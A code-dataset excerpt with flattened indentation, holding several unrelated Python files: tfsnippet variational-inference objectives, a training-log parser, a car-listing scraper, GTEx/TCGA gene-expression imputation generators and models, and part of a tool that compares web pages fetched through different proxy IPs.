"""
Get the SGVB training objective for importance weighted objective.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "iwae")
Returns:
tf.Tensor: The per-data SGVB training objective for importance
weighted objective.
See Also:
:func:`tfsnippet.variational.iwae_estimator`
"""
_require_multi_samples(self._vi.axis, 'iwae training objective')
with tf.name_scope(name, default_name='iwae'):
return -iwae_estimator(
log_values=self._vi.log_joint - self._vi.latent_log_prob,
axis=self._vi.axis
)
def vimco(self, name=None):
"""
Get the VIMCO training objective.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "vimco")
Returns:
tf.Tensor: The per-data VIMCO training objective.
See Also:
:meth:`zhusuan.variational.ImportanceWeightedObjective.vimco`
"""
_require_multi_samples(self._vi.axis, 'vimco training objective')
with tf.name_scope(name, default_name='vimco'):
return self._vi.zs_importance_weighted_objective().vimco()
def rws_wake(self, name=None):
"""
Get the wake-phase Reweighted Wake-Sleep (RWS) training objective.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "rws_wake")
Returns:
tf.Tensor: The per-data wake-phase RWS training objective.
See Also:
:meth:`zhusuan.variational.InclusiveKLObjective.rws`
"""
_require_multi_samples(
self._vi.axis, 'reweighted wake-sleep training objective')
with tf.name_scope(name, default_name='rws_wake'):
return self._vi.zs_klpq().rws()
class VariationalEvaluation(object):
"""Factory for variational evaluation outputs."""
def __init__(self, vi):
"""
Construct a new :class:`VariationalEvaluation`.
Args:
vi (VariationalInference): The variational inference object.
"""
self._vi = vi
def importance_sampling_log_likelihood(self, name=None):
"""
Compute :math:`\\log p(x)` by importance sampling.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "importance_sampling_log_likelihood")
Returns:
tf.Tensor: The per-data :math:`\\log p(x)`.
See Also:
:meth:`zhusuan.evaluation.is_loglikelihood`
"""
_require_multi_samples(
self._vi.axis, 'importance sampling log-likelihood')
return importance_sampling_log_likelihood(
log_joint=self._vi.log_joint,
latent_log_prob=self._vi.latent_log_prob,
axis=self._vi.axis,
name=name or 'importance_sampling_log_likelihood'
)
is_loglikelihood = importance_sampling_log_likelihood
"""Short-cut for :meth:`importance_sampling_log_likelihood`."""
``` |
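A bare-bones sketch of driving `VariationalInference` directly with pre-computed log-densities; the `[n_samples, batch_size]` placeholder shapes go with `axis=0` and are an assumption. In practice these tensors usually come from a `VariationalChain`, as in the tests above.
```python
import tensorflow as tf

from tfsnippet.variational import VariationalInference

# [n_samples, batch_size] log-densities, e.g. produced by a variational net
log_joint = tf.placeholder(tf.float32, shape=[None, None], name='log_joint')
latent_log_prob = tf.placeholder(tf.float32, shape=[None, None], name='latent_log_prob')

vi = VariationalInference(log_joint, [latent_log_prob], axis=0)

elbo = vi.lower_bound.elbo()               # per-data evidence lower-bound
loss = tf.reduce_mean(vi.training.sgvb())  # SGVB surrogate to minimize
nll = -vi.evaluation.is_loglikelihood()    # importance-sampling log p(x)
```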
{
"source": "897741007/EIAA",
"score": 3
} |
#### File: 897741007/EIAA/analysis_log.py
```python
import pandas as pd
import numpy as np
from pandas.io.parsers import read_csv
class log_rec():
def __init__(self, log_file):
self.log_file = log_file
self.mark = log_file.split('.')[-1]
self.info_, self.log_ = self.load_log()
def load_log(self):
with open(self.log_file, 'r') as f:
rec = []
info = []
tag_r = 0
tag_i = 0
for l in f:
if l.startswith('='):
rec.append([])
info.append([])
tag_r = 0
tag_i = 1
elif l.startswith('-'):
tag_r = 1
tag_i = 0
if tag_i:
info[-1].append(l.strip())
if tag_r:
rec[-1].append(l.strip())
return info, rec
def sep_rec(self, rec):
rec_ = rec.strip('[]').split('] [')
rec_arg = rec_[0]
rec_terms = {}
for t in rec_[1:]:
tn, vn = t.split(' ')
rec_terms[tn] = vn
return rec_arg, rec_terms
def get_term(self, arg, terms, terms_type=None, to_file=False):
        if terms_type is None:
terms_type = [float for _ in terms]
else:
assert len(terms) == len(terms_type)
filtered = []
for rep in self.log_:
filtered.append([])
for rec in rep:
rec_arg, reg_terms = self.sep_rec(rec)
if rec_arg == arg:
temp = [reg_terms[i] for i in terms]
temp = [terms_type[i](temp[i]) for i in range(len(terms))]
filtered[-1].append(temp)
if to_file:
for rep_idx, rep in enumerate(filtered):
index = list(range(len(rep)))
file_data = {'index':index}
for t_idx in range(len(terms)):
file_data[terms[t_idx]] = [i[t_idx] for i in rep]
file_data = pd.DataFrame(file_data)
file_data.to_csv('{0}_analysis_rep{1}.csv'.format(self.log_file, rep_idx), index=False)
else:
return filtered
def get_val_test(self, term, by='step', to_file=False):
assert by in ('step', 'epoch')
filtered = []
for rep in self.log_:
filtered.append({'validation':[], 'test':[]})
for rec in rep:
rec_arg, rec_terms = self.sep_rec(rec)
if ' ' in rec_arg:
tag_s, tag_p = rec_arg.split(' ')
if tag_s == by:
v = float(rec_terms[term])
filtered[-1][tag_p].append(v)
if not to_file:
store = []
for rep_idx, rep in enumerate(filtered):
index = list(range(1, len(rep['test'])+1))
file_data = {'index':index, 'validation':rep['validation'], 'test':rep['test']}
file_data = pd.DataFrame(file_data)
if to_file:
file_data.to_csv('{0}_{1}_rep{2}.csv'.format(self.mark, term, rep_idx), index=False)
else:
store.append(file_data)
if not to_file:
return store
def summary(files, best='min'):
assert best in ('min', 'max')
summ = {}
for f in files:
strategy = '_'.join(f.split('_')[:-1])
d = pd.read_csv(f)
val = d['validation']
test = d['test']
if best == 'min':
best_val_loc = np.argmin(val)
else:
best_val_loc = np.argmax(val)
best_test = test[best_val_loc]
summ[strategy] = best_test
#summ = pd.DataFrame(summ)
return summ
def summ(files):
k = log_rec(files)
z = k.get_val_test('MAE')
log = {}
ilter = len(k.info_)
tt = []
val = []
b_tt = []
for i in range(ilter-1, -1, -1):
tt.append(min(z[i]['test']))
val.append(min(z[i]['validation']))
b_tt.append(z[i]['test'][np.argmin(z[i]['validation'])])
log['test'] = tt
log['validation'] = val
log['test_at_validation'] = b_tt
return log
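# Usage sketch (assumed, not part of the original module): given a log file
# written in the "="/"-" delimited format parsed above, the per-replicate MAE
# curves could be extracted and dumped to CSV roughly like this; the file name
# "train.log" is a placeholder.
#     rec = log_rec('train.log')
#     curves = rec.get_val_test('MAE', by='step')          # list of DataFrames
#     rec.get_val_test('MAE', by='step', to_file=True)     # writes <mark>_MAE_rep<N>.csv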
``` |
{
"source": "89885512495/CarsScraper",
"score": 3
} |
#### File: 89885512495/CarsScraper/app.py
```python
from avito import Avito
from drom import Drom
def collect_data(model: str, pages: int):
"""Get list of cars from sources"""
collected_data = []
for page in range(1, pages):
        # collecting always starts from the 1st page
print(f"Собираю информацию со страницы - {page}")
avito_cars = Avito(model, page)
drom_cars = Drom(model, page)
        # if a source hasn't got data for one of the pages, it will be an empty [] list
        # so we don't need it
data_from_avito = list(avito_cars.get_content())
if data_from_avito:
collected_data += data_from_avito
data_from_drom = list(drom_cars.get_content())
if data_from_drom:
collected_data += data_from_drom
# sort from lowest to highest price
collected_data.sort(key=lambda i: i[1])
print("\nВот, что я нашел:")
for i in range(len(collected_data)):
print(
collected_data[i][0] + "г., ",
"Цена - ", collected_data[i][1], "₽",
", Источник: ", collected_data[i][2],
)
if __name__ == "__main__":
collect_data("toyota", pages=2)
``` |
{
"source": "899la/GTEx-imputation",
"score": 3
} |
#### File: GTEx-imputation/data/generators.py
```python
from data.gtex_generator import GTExGenerator
from data.tcga_generator import TCGAGenerator
def get_generator(name):
print('Dataset: {}'.format(name))
if name == 'GTEx':
return GTExGenerator
elif name == 'TCGA':
return TCGAGenerator
else:
raise ValueError('Unknown generator {}'.format(name))
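# Usage sketch (assumed, not part of the original file): the returned class is
# instantiated by the caller, e.g.
#     GeneratorCls = get_generator('GTEx')
#     generator = GeneratorCls(batch_size=64)   # constructor arguments are assumptions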
```
#### File: GTEx-imputation/data/gtex_generator.py
```python
import numpy as np
import pandas as pd
from data.data_utils import standardize, split_train_test, sample_mask
from data.pathways import select_genes_pathway
GTEX_FILE = '/home/rv340/adversarial-gtex/data/GTEX_data.csv'
METADATA_FILE = '/home/rv340/adversarial-gtex/data/GTEx_Analysis_2017-06-05_v8_Annotations_SubjectPhenotypesDS.txt'
def GTEx(file, random_seed=0):
df = pd.read_csv(file, index_col=0).sample(frac=1, random_state=random_seed)
tissues = df['tissue'].values
sampl_ids = df.index.values
del df['tissue']
gene_symbols = df.columns.values
return np.float32(df.values), gene_symbols, sampl_ids, tissues
def GTEx_metadata(file):
df = pd.read_csv(file, delimiter='\t')
df = df.set_index('SUBJID')
return df
class GTExGenerator:
def __init__(self, file=GTEX_FILE, metadata_file=METADATA_FILE, pathway=None, batch_size=128, m_low=0.5, m_high=0.5,
random_seed=0, inplace_mode=False):
np.random.seed(random_seed)
self.file = file
self.metadata_file = metadata_file
self.batch_size = batch_size
self.m_low = m_low
self.m_high = m_high
self.pathway = pathway
self.inplace_mode = inplace_mode
# Load data
x, gene_symbols, self.sample_ids, self.tissues = GTEx(file)
# Select genes from specific pathway
gene_idxs, self.gene_symbols = select_genes_pathway(gene_symbols, pathway)
self.x = x[:, gene_idxs]
self.nb_genes = len(self.gene_symbols)
# Load metadata
df_metadata = GTEx_metadata(metadata_file)
self.metadata = df_metadata
# Process categorical metadata
cat_cols = ['SEX', 'COHORT'] # 'SEX', 'COHORT'
self.cat_cols = cat_cols
df_metadata[cat_cols] = df_metadata[cat_cols].astype('category')
cat_dicts = [df_metadata[cat_col].cat.categories.values for cat_col in cat_cols]
df_metadata[cat_cols] = df_metadata[cat_cols].apply(lambda x: x.cat.codes)
cat_covs = df_metadata.loc[self.sample_ids, cat_cols].values
tissues_dict_inv = np.array(list(sorted(set(self.tissues))))
tissues_dict = {t: i for i, t in enumerate(tissues_dict_inv)}
tissues = np.vectorize(lambda t: tissues_dict[t])(self.tissues)
cat_dicts.append(tissues_dict_inv)
cat_covs = np.concatenate((cat_covs, tissues[:, None]), axis=-1)
cat_covs = np.int32(cat_covs)
self.tissues_dict = tissues_dict
self.tissues_dict_inv = tissues_dict_inv
self.vocab_sizes = [len(c) for c in cat_dicts]
self.nb_categorical = cat_covs.shape[-1]
# Process numerical metadata
num_cols = ['AGE'] # 'AGE'
num_covs = df_metadata.loc[self.sample_ids, num_cols].values
num_covs = standardize(num_covs)
num_covs = np.float32(num_covs)
self.nb_numeric = num_covs.shape[-1]
# Train/val/test split
x_train, x_test, sampl_ids_train, sampl_ids_test = split_train_test(self.x, self.sample_ids)
x_train = standardize(x_train)
x_test = standardize(x_test)
x_train, x_val, _, sampl_ids_val = split_train_test(x_train, sampl_ids_train, train_rate=0.8)
self.x_train = x_train
self.x_val = x_val
self.x_test = x_test
num_covs_train, num_covs_test, _, _ = split_train_test(num_covs, self.sample_ids)
num_covs_train = standardize(num_covs_train)
num_covs_test = standardize(num_covs_test)
num_covs_train, num_covs_val, _, _ = split_train_test(num_covs_train, sampl_ids_train, train_rate=0.8)
self.num_covs_train = num_covs_train
self.num_covs_val = num_covs_val
self.num_covs_test = num_covs_test
cat_covs_train, cat_covs_test, _, _ = split_train_test(cat_covs, self.sample_ids)
cat_covs_train, cat_covs_val, sampl_ids_train, sampl_ids_val = split_train_test(cat_covs_train,
sampl_ids_train,
train_rate=0.8)
self.cat_covs_train = cat_covs_train
self.cat_covs_val = cat_covs_val
self.cat_covs_test = cat_covs_test
self.sample_ids_train = sampl_ids_train
self.sample_ids_val = sampl_ids_val
self.sample_ids_test = sampl_ids_test
self.train_mask = sample_mask(len(sampl_ids_train), self.nb_genes, m_low=m_low, m_high=m_high)
self.val_mask = sample_mask(len(sampl_ids_val), self.nb_genes, m_low=m_low, m_high=m_high)
self.test_mask = sample_mask(len(sampl_ids_test), self.nb_genes, m_low=m_low, m_high=m_high)
"""
def train_sample(self, size=None):
if size is None:
size = self.batch_size
sample_idxs = np.random.choice(self.x_train.shape[0], size=size, replace=False)
x = self.x_train[sample_idxs]
cc = self.cat_covs_train[sample_idxs]
nc = self.num_covs_train[sample_idxs]
return x, cc, nc
"""
def train_sample_MCAR(self, size=None, alpha=0.5, beta=0.5):
if size is None:
size = self.batch_size
sample_idxs = np.random.choice(self.x_train.shape[0], size=size, replace=False)
x = self.x_train[sample_idxs]
cc = self.cat_covs_train[sample_idxs]
nc = self.num_covs_train[sample_idxs]
mask_2 = sample_mask(size, self.nb_genes, m_low=alpha, m_high=beta)
if self.inplace_mode:
mask_1 = self.train_mask[sample_idxs]
else:
mask_1 = sample_mask(size, self.nb_genes, m_low=self.m_low, m_high=self.m_high)
mask = (mask_1, mask_2)
# x, cc, nc = self.train_sample(size)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
def train_iterator_MCAR(self, alpha=0.5, beta=0.5):
while True:
yield self.train_sample_MCAR(size=self.batch_size, alpha=alpha, beta=beta)
def val_sample(self):
x = self.x_val
cc = self.cat_covs_val
nc = self.num_covs_val
return x, cc, nc
def val_sample_MCAR(self, alpha=0.5, beta=0.5):
x, cc, nc = self.val_sample()
# size = x.shape[0]
if self.inplace_mode:
input_mask = sample_mask(x.shape[0], self.nb_genes, m_low=alpha, m_high=beta)
mask = (self.val_mask, input_mask) # Trick to speed up training
else:
mask = sample_mask(x.shape[0], self.nb_genes, m_low=self.m_low, m_high=self.m_high)
# mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
def test_sample(self):
x = self.x_test
cc = self.cat_covs_test
nc = self.num_covs_test
return x, cc, nc
def test_sample_MCAR(self, m_low=0.5, m_high=0.5, random_seed=0):
if self.inplace_mode:
return self.train_sample_MCAR(size=len(self.sample_ids_train))
np.random.seed(random_seed)
x, cc, nc = self.test_sample()
size = x.shape[0]
mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
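# Usage sketch (assumed, not part of the original file): the MCAR iterator
# yields ((x, cat_covs, num_covs, (mask_1, mask_2)), x) tuples, so a model can
# consume it directly; the constructor arguments below are assumptions and the
# hard-coded data paths above must exist.
#     gen = GTExGenerator(batch_size=128, inplace_mode=False)
#     (x, cc, nc, mask), y = next(gen.train_iterator_MCAR())
#     print(x.shape, cc.shape, nc.shape, y.shape)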
```
#### File: GTEx-imputation/data/tcga_generator.py
```python
import numpy as np
import pandas as pd
from data.data_utils import standardize, split_train_test, sample_mask, ENSEMBL_to_gene_symbols
from data.pathways import select_genes_pathway
def TCGA_FILE(cancer_type):
return '/local/scratch/rv340/tcga/TCGA-{}.htseq_fpkm.tsv'.format(cancer_type)
def TCGA_METADATA_FILE(cancer_type):
return '/local/scratch/rv340/tcga/{}_clinicalMatrix'.format(cancer_type)
def get_GTEx_tissue(cancer_type):
if cancer_type == 'LAML':
return 'Whole_Blood', 48
elif cancer_type == 'BRCA':
return 'Breast_Mammary_Tissue', 19
elif cancer_type == 'LUAD':
return 'Lung', 31
else:
raise ValueError('Cancer type {} not supported'.format(cancer_type))
def TCGA(file, clinical_file, tissue_idx=None, gtex_gene_symbols=None):
df = pd.read_csv(file, delimiter='\t')
df = df.set_index('Ensembl_ID')
# Transform gene symbols
gene_symbols, ENSEMBL_found = ENSEMBL_to_gene_symbols(df.index)
df = df.loc[ENSEMBL_found]
df = df.rename(index=dict(zip(df.index, gene_symbols)))
if gtex_gene_symbols is not None:
df = df.loc[gtex_gene_symbols]
gene_symbols = gtex_gene_symbols
df = df.groupby('Ensembl_ID', group_keys=False).apply(
lambda x: x[x.sum(axis=1) == np.max(x.sum(axis=1))]) # Remove duplicates, keep max
# Get data
x_TCGA = df.values.T
# Process covariates
sample_ids = df.columns
clinical_df = pd.read_csv(clinical_file, delimiter='\t')
idxs = [np.argwhere(s[:-1] == clinical_df['sampleID']).ravel()[0] for s in df.columns]
gender = np.array([0 if g == 'MALE' else 1 for g in clinical_df.iloc[idxs]['gender']])
age = clinical_df.iloc[idxs]['age_at_initial_pathologic_diagnosis'].values
mean_age = 52.7763 # Mean age GTEx
std_age = 12.9351 # Std age GTEx
age = (age - mean_age) / std_age
cc_TCGA = np.zeros((x_TCGA.shape[0], 3))
cc_TCGA[:, 0] = gender
cc_TCGA[:, 2] = tissue_idx
nc_TCGA = age[..., None]
return x_TCGA, gene_symbols, sample_ids, np.int32(cc_TCGA), nc_TCGA
class TCGAGenerator:
def __init__(self, pathway=None, cancer_type=None, file=None, metadata_file=None,
gene_symbols=None, batch_size=128, m_low=0.5, m_high=0.5, random_seed=0):
assert cancer_type or (file and metadata_file)
if file is None:
file = TCGA_FILE(cancer_type)
if metadata_file is None:
metadata_file = TCGA_METADATA_FILE(cancer_type)
self.tissue = None
self.tissue_idx = None
if cancer_type:
self.tissue, self.tissue_idx = get_GTEx_tissue(cancer_type)
np.random.seed(random_seed)
self.file = file
self.metadata_file = metadata_file
self.batch_size = batch_size
self.m_low = m_low
self.m_high = m_high
self.pathway = pathway
# Load data
x_TCGA, gene_symbols, sample_ids, cc_TCGA, nc_TCGA = TCGA(file, metadata_file, tissue_idx=self.tissue_idx,
gtex_gene_symbols=gene_symbols)
# Select genes from specific pathway
gene_idxs, self.gene_symbols = select_genes_pathway(gene_symbols, pathway)
self.x = standardize(np.log(1 + x_TCGA[:, gene_idxs]))
self.x[np.isnan(self.x)] = 0 # Genes with std 0
self.nb_genes = len(self.gene_symbols)
# Store covariates
self.cat_covs = cc_TCGA
self.num_covs = nc_TCGA
def train_sample(self, size=None):
if size is None:
size = self.batch_size
sample_idxs = np.random.choice(self.x.shape[0], size=size, replace=False)
x = self.x[sample_idxs]
cc = self.cat_covs[sample_idxs]
nc = self.num_covs[sample_idxs]
return x, cc, nc
def train_sample_MCAR(self, size=None, m_low=None, m_high=None):
if size is None:
size = self.batch_size
if m_low is None:
m_low = self.m_low
if m_high is None:
m_high = self.m_high
mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
x, cc, nc = self.train_sample(size)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
def train_iterator_MCAR(self):
while True:
yield self.train_sample_MCAR()
def val_sample(self):
x = self.x
cc = self.cat_covs
nc = self.num_covs
return x, cc, nc
def val_sample_MCAR(self, m_low=None, m_high=None):
if m_low is None:
m_low = self.m_low
if m_high is None:
m_high = self.m_high
x, cc, nc = self.val_sample()
size = x.shape[0]
mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
def test_sample(self):
x = self.x
cc = self.cat_covs
nc = self.num_covs
return x, cc, nc
def test_sample_MCAR(self, m_low=None, m_high=None, random_seed=None):
if random_seed is not None:
np.random.seed(random_seed)
if m_low is None:
m_low = self.m_low
if m_high is None:
m_high = self.m_high
x, cc, nc = self.test_sample()
size = x.shape[0]
mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
```
#### File: GTEx-imputation/models/inductive_imputer.py
```python
from models.base_imputer import BaseImputer
import tensorflow as tf
tfk = tf.keras
tfkl = tf.keras.layers
class InductiveImputer(BaseImputer):
def __init__(self, x_dim, vocab_sizes, nb_numeric, nb_categoric, config, name='InductiveImputer', **kwargs):
super(InductiveImputer, self).__init__(x_dim, vocab_sizes, nb_numeric, nb_categoric, config, name=name,
**kwargs)
def loss_fn(self, x, x_gen, eps=1e-7):
x, mask = x
# Masks variables that were provided as input in the forward pass
x_ = x * (1 - mask) # Input variables
x_gen_ = x_gen * (1 - mask) # Reconstructed input variables
mask_counts = tf.reduce_sum(1 - mask, axis=-1) # Shape=(nb_samples, )
loss = tf.reduce_sum((1 - mask) * tf.math.squared_difference(x_, x_gen_), axis=-1)
return tf.reduce_mean(loss / (mask_counts + eps))
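# Worked example (not part of the original file) of the masked loss above:
# with mask == 1 marking observed entries, the loss is the squared error on the
# hidden entries only, averaged over how many entries were hidden per sample.
#     x     = [1.0, 2.0, 3.0]
#     x_gen = [1.0, 0.0, 5.0]
#     mask  = [1,   0,   0  ]
#     loss  = ((2 - 0)**2 + (3 - 5)**2) / 2 = 4.0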
```
#### File: GTEx-imputation/models/pseudomask_imputer.py
```python
import tensorflow as tf
from models.base_imputer import BaseImputer
from models.train_utils import sample_mask_tf
from data.data_utils import sample_mask
import numpy as np
tfk = tf.keras
tfkl = tf.keras.layers
class PseudoMaskImputer(BaseImputer):
def __init__(self, x_dim, vocab_sizes, nb_numeric, nb_categoric, config, m_low=0.5, m_high=0.5, name='UnguidedImputer', **kwargs):
super(PseudoMaskImputer, self).__init__(x_dim, vocab_sizes, nb_numeric, nb_categoric, config, name=name,
**kwargs)
self.m_low = m_low
self.m_high = m_high
def loss_fn(self, x, x_gen, eps=1e-7):
x, mask = x
# input_mask = tf.cast(x != 0, tf.float32)
# output_mask = mask * (1 - input_mask)
output_mask = mask
# Masks variables that were provided as input in the forward pass
x_ = x * output_mask # Input variables
x_gen_ = x_gen * output_mask # Reconstructed input variables
mask_counts = tf.reduce_sum(output_mask, axis=-1) # Shape=(nb_samples, )
loss = tf.reduce_sum(output_mask * tf.math.squared_difference(x_, x_gen_), axis=-1)
return tf.reduce_mean(loss / (mask_counts + eps))
def call(self, x, **kwargs):
x, cat, num, mask = x
if type(mask) is tuple: # Keras is initialising
mask = mask[0]
x_ = x * mask
return self.model([x_, cat, num, mask], **kwargs)
def train_step(self, data):
# Unpack the data. Its structure depends on your model and
# on what you pass to `fit()`.
x, y = data
x, cat, num, mask = x
mask, input_mask = mask
if self.config.inplace_mode:
output_mask = mask * (1 - input_mask)
input_mask = mask * input_mask
else: # mask should be all ones
output_mask = (1 - input_mask)
with tf.GradientTape() as tape:
y_pred = self.call((x, cat, num, input_mask), training=True) # Forward pass
# Compute the loss value
# (the loss function is configured in `compile()`)
loss = self.loss_fn((x, output_mask), y_pred) # compiled_loss((x, mask), y_pred, regularization_losses=self.losses)
# Compute gradients
trainable_vars = self.trainable_variables
gradients = tape.gradient(loss, trainable_vars)
# Update weights
self.optimizer.apply_gradients(zip(gradients, trainable_vars))
# Update metrics (includes the metric that tracks the loss)
self.compiled_metrics.update_state(y, y_pred)
# Return a dict mapping metric names to current value
return {**{'loss': loss}, **{m.name: m.result() for m in self.metrics}}
def test_step(self, data):
# Unpack the data
x, y = data
x, cat, num, mask = x
bs = tf.shape(x)[0]
if self.config.inplace_mode:
mask, input_mask = mask
# input_mask = sample_mask(bs=mask.shape[0], nb_genes=self.x_dim) # sample_mask_tf(bs=bs, nb_genes=self.x_dim)
output_mask = mask * (1 - input_mask)
input_mask = mask * input_mask
else:
output_mask = (1 - mask)
input_mask = mask
# input_mask = sample_mask(bs=self.config, nb_genes=self.x_dim)
# Compute predictions
y_pred = self.call((x, cat, num, input_mask), training=False)
# Updates the metrics tracking the loss
loss = self.loss_fn((x, output_mask), y_pred) # compiled_loss(y, y_pred, regularization_losses=self.losses)
# Update the metrics.
self.compiled_metrics.update_state(y, y_pred)
# Return a dict mapping metric names to current value.
# Note that it will include the loss (tracked in self.metrics).
return {**{'loss': loss}, **{m.name: m.result() for m in self.metrics}}
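# Note (an interpretation, not part of the original file): in the steps above,
# `input_mask` selects the entries fed into the network while `output_mask`
# selects the entries the loss is computed on. With inplace_mode the two are
# disjoint subsets of the fixed per-sample `mask`; otherwise the output mask is
# simply the complement of the sampled input mask.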
``` |
{
"source": "89berner/abnormal",
"score": 3
} |
#### File: abnormal/abnormal/Target.py
```python
from AutoVivification import AutoVivification
import Utils
import cv2
import numpy as np
import hashlib
import pprint
import logging
import threading
import Queue
from sets import Set
from Result import Result
import traceback
import sys
from Observer import Observer
class ThreadProcessTarget(threading.Thread):
"""Threaded Url Grab"""
def __init__(self, queue, working_observers, max_ips, capture_on):
threading.Thread.__init__(self)
self.queue = queue
self.working_observers = working_observers
self.max_ips = max_ips
self.capture_on = capture_on
def run(self):
while True:
observer = self.queue.get()
if len(self.working_observers) < self.max_ips:
if observer.request(): #Get content and screenshots
self.working_observers.append(observer)
logging.debug("Count is now %s of %s" % (len(self.working_observers), self.max_ips) )
self.queue.task_done()
class Target:
def __init__(self, name, urls, ip_list, options):
self.urls = urls
self.max_threads = options.n_threads
self.name = name
self.max_ips = options.n_proxies
self.capture_on = options.capture_on
self.options = options
self.possible_observers = []
for ip in ip_list:
self.possible_observers.append(Observer(ip,urls,options))
self.diff_vars = {}
self.missing_vars = {}
self.missing_links = {}
self.diff_images = {}
self.diff_marked_images = {}
for url in urls:
self.diff_vars[url] = {}
self.missing_vars[url] = Set()
self.missing_links[url] = Set()
self.diff_images[url] = {}
self.diff_marked_images[url] = {}
#Set instance variables
self.observers = []
self.results = Result(name, urls)
self.observers_vars = AutoVivification()
self.processed = AutoVivification()
self.contourns = {}
self.observers_map = {}
def process(self):
#Get observers to use
self.get_working_observers()
if (not self.options.no_source):
#Set the data based on the content and the screenshot
self.process_observers()
#Check the difference between observers
#populate missing_vars, diff_vars, missing_links, diff_images, diff_marked_images
self.analyze_observers()
#Compare observers to create Result object
self.compare_observers()
def get_working_observers(self):
working_observers = []
queue = Queue.Queue()
for i in range(self.max_threads):
t = ThreadProcessTarget(queue,working_observers,self.max_ips,self.capture_on)
t.setDaemon(True)
t.start()
for observer in self.possible_observers:
queue.put(observer)
queue.join()
self.observers = working_observers #[:self.max_ips]
for observer in working_observers:
self.observers_map[observer.ip] = observer
logging.info("Got %s working observers" % len(working_observers))
def process_observers(self):
for observer in self.observers:
for url in self.urls:
address = observer.get_address(url)
address.set_data()
def analyze_observers(self):
#For each url match observer by observer and see
for url in self.urls:
for observer1 in self.observers:
for observer2 in self.observers:
if (observer1.ip != observer2.ip):
if (not self.options.no_source):
#what variables are missing or different
self.check_vars(observer1,observer2,url)
#Find difference in links
self.check_links(observer1,observer2,url)
#difference between screenshots
if self.capture_on:
self.check_screenshots(observer1,observer2,url)
def check_vars(self,observer1,observer2,url):
logging.debug('Checking vars between %s-%s for %s' % (observer1.ip,observer2.ip,url))
vars1 = observer1.get_address(url).vars
vars2 = observer2.get_address(url).vars
for var in vars1:
logging.debug('Comparing for vars: %s %s' % (var,vars1[var]))
if (var not in vars2):
self.missing_vars[url].add(var)
elif (vars1[var] != vars2[var]):
if not var in self.diff_vars[url]:
self.diff_vars[url][var] = 0
self.diff_vars[url][var] += 1
#Populate observers index
for var in vars1:
self.observers_vars[observer1.ip][url][var] = vars1[var]
for var in vars2:
self.observers_vars[observer2.ip][url][var] = vars2[var]
def check_screenshots(self, observer1, observer2, url):
if not self.get_processed(observer2,observer1,url,'screen'):
image1 = observer1.read_image(url)
image2 = observer2.read_image(url)
Utils.resize_images(image1,image2)
difference_1 = cv2.subtract(image1, image2)
difference_2 = cv2.subtract(image2, image1)
result = not np.any(difference_1)
#If different
if result is False:
logging.debug('Comparing images between %s-%s for %s' % (observer1.ip,observer2.ip,url))
#First set up different types of images to have them on their own
self.set_different_image(image1, url, observer1.get_image(url))
self.set_different_image(image2, url, observer2.get_image(url))
#logging.debug('The images are different')
filename_1 = "%s-%s-%s" % (observer1.ip, observer2.ip, url)
#cv2.imwrite("tmp/comp/%s.jpg" % Utils.as_filename(filename_1), difference_1)
#filename_2 = "%s-%s-%s" % (observer2.ip, observer1.ip, url)
#cv2.imwrite("tmp/comp/%s.jpg" % Utils.as_filename(filename_2), difference_2)
#concat_images = np.concatenate((image1, image2, difference_1, difference_2), axis=1)
#cv2.imwrite("tmp/comp_full/%s.jpg" % Utils.as_filename(filename_1), concat_images)
contourn_image1 = Utils.draw_contourns(image1,image2)
file_path = "tmp/comp_draw/%s.jpg" % Utils.as_filename(filename_1)
cv2.imwrite(file_path, contourn_image1)
self.set_different_marked_image(contourn_image1,url,file_path)
self.set_processed(observer1,observer2,url,'screen')
#logging.debug("Finished comparing images..")
else:
#logging.debug("Skipping comparison")
pass
def check_links(self,observer1,observer2,url):
links1 = observer1.get_address(url).links
        links2 = observer2.get_address(url).links
for link in links1:
logging.debug('Comparing links: %s' % link)
if link not in links2:
                self.missing_links[url].add(link)
def compare_observers(self):
for url in self.urls:
self.compare(url)
def compare(self,url):
logging.debug('Doing compare for %s' % url)
url_results = self.results.get(url)
#Looking for missing js variables
for missing in self.missing_vars[url]:
logging.debug('Looking for %s' % missing)
for observer in self.observers:
addr = observer.get_address(url)
if missing not in addr.vars:
logging.debug("%s is missing" % missing)
url_results.set_missing_var(missing)
#Looking for differences in js variables
for diff_var in self.diff_vars[url]:
logging.debug('Comparing %s' % diff_var)
for observer in self.observers:
addr = observer.get_address(url)
if diff_var in addr.vars:
var_value = addr.vars[diff_var]
url_results.set_diff_var(diff_var,var_value)
#Looking for missing links
for missing in self.missing_links[url]:
logging.debug('Looking for %s' % missing)
for observer in self.observers:
addr = observer.get_address(url)
if missing not in addr.links:
logging.debug("%s is missing" % missing)
url_results.set_missing_link(missing)
#Looking for different captures
for md5 in self.diff_images[url]:
logging.debug('Looking for %s' % md5)
url_results.set_diff_images(md5, self.diff_images[url][md5])
#Looking for different marked captures
for md5 in self.diff_marked_images[url]:
logging.debug('Looking for %s' % md5)
url_results.set_diff_marked_images(md5, self.diff_marked_images[url][md5])
def set_different_image(self,image, url, filename):
image_hash = hashlib.md5(image).hexdigest()
if image_hash not in self.diff_images[url]:
self.diff_images[url][image_hash] = filename
def set_different_marked_image(self,image, url, filename):
image_hash = hashlib.md5(image).hexdigest()
if image_hash not in self.diff_marked_images[url]:
self.diff_marked_images[url][image_hash] = filename
def report(self):
print "Report for %s" % self.name
self.results.report()
pp = pprint.PrettyPrinter(indent=4)
logging.debug(pp.pprint(self.observers_vars))
    # Go through the observers, checking that at least one has the var
def check_var(self,name):
for observer in self.observers:
for url in observer.urls:
if name in self.observers_vars[observer.ip][url]:
return True
return False
#Go through the observers looking for the ones that have the variables
def get_var_observers(self,name,value):
result = Set()
